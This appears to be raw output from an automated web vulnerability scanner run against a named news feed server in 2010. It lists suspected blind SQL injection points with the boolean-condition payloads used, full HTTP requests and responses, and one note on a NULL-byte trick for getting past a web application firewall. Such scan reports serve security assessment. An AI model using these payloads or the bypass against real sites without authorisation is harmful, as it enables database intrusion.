<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d2--%20/200914.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:36 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200915.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:18 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200915.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:18:37 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:18:37 GMT Date: Tue, 07 Dec 2010 23:18:37 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:18:40 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200916.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:18:40 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 43065906'%20or%201%3d1--%20 and 43065906'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi43065906'%20or%201%3d1--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:54 GMT Date: Tue, 07 Dec 2010 23:21:54 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi43065906'%20or%201%3d2--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:09 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:10 GMT Date: Tue, 07 Dec 2010 23:22:10 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16674106'%20or%201%3d1--%20 and 16674106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi16674106'%20or%201%3d1--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi16674106'%20or%201%3d2--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:21 GMT Date: Tue, 07 Dec 2010 23:21:21 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14517237'%20or%201%3d1--%20 and 14517237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss14517237'%20or%201%3d1--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
Request 2
GET /mngi/rss14517237'%20or%201%3d2--%20/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:36 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:36 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48401163'%20or%201%3d1--%20 and 48401163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d1--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:18 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d2--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:18 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:16 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
